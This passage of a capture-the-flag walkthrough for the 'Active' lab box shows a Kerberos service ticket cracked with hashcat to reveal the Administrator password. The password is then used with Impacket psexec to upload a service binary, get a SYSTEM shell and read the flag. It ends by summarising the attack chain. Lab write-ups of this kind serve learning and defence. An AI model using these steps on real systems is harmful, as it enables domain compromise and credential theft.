$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$efc61854f043150d962fac56d17ef9e4$ecd203c73bea10c35e5d04764024506e7bfc81f9e98c5588d2193972afa2cff88b927afeac4a1ff88a661b2d7f687bd0fd59b362088d540e2ee78f619cc234d508256e91afdc9fd86f03bbc3dffc3560bbb4e4e1cf9e409cfe94303b02b9bd2739c25105514e0f47cb20af8bc6b208d0cf5adc8c80494e67f2301429ef976bcda228e6ac6ff39d5cb4b35618f7d2f6b4293794898ff4b842cf2563a761cbb8594d6f0eab85087752b5a262838379d9b451db3cec77813c30cfd10a941398f51d6e04645a45d57ab59b22565def2868d96c02c676b0089453a4222d708d0d01a6189b07c7d4c000020b9088830ed6aa00e8cc84c35ecb367ab472ede020993ac39c423668b9aadddbcbb5af3982f9d34dbac0339b6dc6ed8e13951b78ad6eeb20edb87571eb4e54b247324d29aa14d97c0f8df510ac4f33a36a839703bdcd88c693245976967c2db19ca841d25dacdd3fd30a7365e40e5cd2679379ef7cc27cb16abd2feee8e439d750cb959a663ab1392585e4671b06a1600bf5645fccbd7ae1cce9eaa0c677d3979fcf4d7330de8e59a91155ad29666bec28b00feafdb7fca5623c5b3e68919e31784efa0a19d76a151ca1078d0a675fd7f26ebe5de2acdddc092250fb2b8f96c9fa597d9e519622eab0e8e2617a0d5e83ec64aabd5c3dae024dc3b0da6360811bfd015b6efe5cda8646a07a1a3249e27800592abc0adc7883eaab170aa3d96fab433b7c7d10d71edce1f9b5eee19ff0d5cc8053ed1547b40a3c2322481c4156bbd9079c003b4abe4c11092ab3c8a3c83b8bb70b7e145e629b00f83769e590c0b65bdf9d58017ad637470e89d977ae85836c65bb0e71643bbc01ee2c77d8e47d14dd5ef24b376d25a084321d7c031964e415e45605d517f187715a3fa582543acc54149ca93b5667846f191a19d4a23f6a5bda5e9bb04942d95c26ce9cef6ae9258419657a412ebd560231d27e19833d39e46038611575349816453830c258245ea22fdcaa36b4fc30e525fe89474832b7c3277b902ed5558259837c0dedc2416976386af9adf914f1e42433b4430907ec7e92f2b8f869d3289c53859099a24ed46271917f6ff7030e1fdf44c19b45d3115735e3c15d57b9547547d9aabe44deb9dcf545ed24b54fb08b19d284f79969b920c9296b539aae4ba80750feef96ee717ccfe9396ee48cdf92ba835a128b7df20f313321a3743070f1720e215af94408c87b9d3f8c13ee9c3830bd80e13a8bc24050:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...c24050
Time.Started.....: Thu Mar 12 18:28:04 2026 (1 sec)
Time.Estimated...: Thu Mar 12 18:28:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 8375.7 kH/s (0.59ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10813440/14344384 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10485760/14344384 (73.10%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: XiaoLing.1215 -> Ms.Jordan
Hardware.Mon.SMC.: Fan0: 16%
Hardware.Mon.#02.: Util: 84% Pwr:213mW
Started: Thu Mar 12 18:27:57 2026
Stopped: Thu Mar 12 18:28:06 2026
jbrown@Jabaris-MacBook-Pro hashcat %
Ticketmaster1968After cracking the ticket, we recover the password. Since SMB is running on port 445, we can use psexec to authenticate and get a shell on the system.
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.129.5.64.....
[*] Found writable share ADMIN$
[*] Uploading file YETMasmX.exe
[*] Opening SVCManager on 10.129.5.64.....
[*] Creating service eehN on 10.129.5.64.....
[*] Starting service eehN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd ../
C:\Windows> cd ../
C:\> cd Users
C:\Users> cd Administrators
The system cannot find the path specified.
C:\Users> cd Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> type root.txt
***AdminFlagFoundHERE***
C:\Users\Administrator\Desktop>And just like that, we found the flag.
What started with some simple enumeration using Nmap eventually led us to an exposed SMB share, a Group Policy Preferences password, and finally a Kerberoastable account. From there it was just a matter of requesting the ticket, cracking it with Hashcat, and using the recovered credentials to get a shell.
This box is a good reminder that small misconfigurations in Active Directory can go a long way. A readable share and an exposed GPP password was all it took to start the chain that eventually led to domain compromise.
Hope you enjoyed the walkthrough, and as always — happy hacking.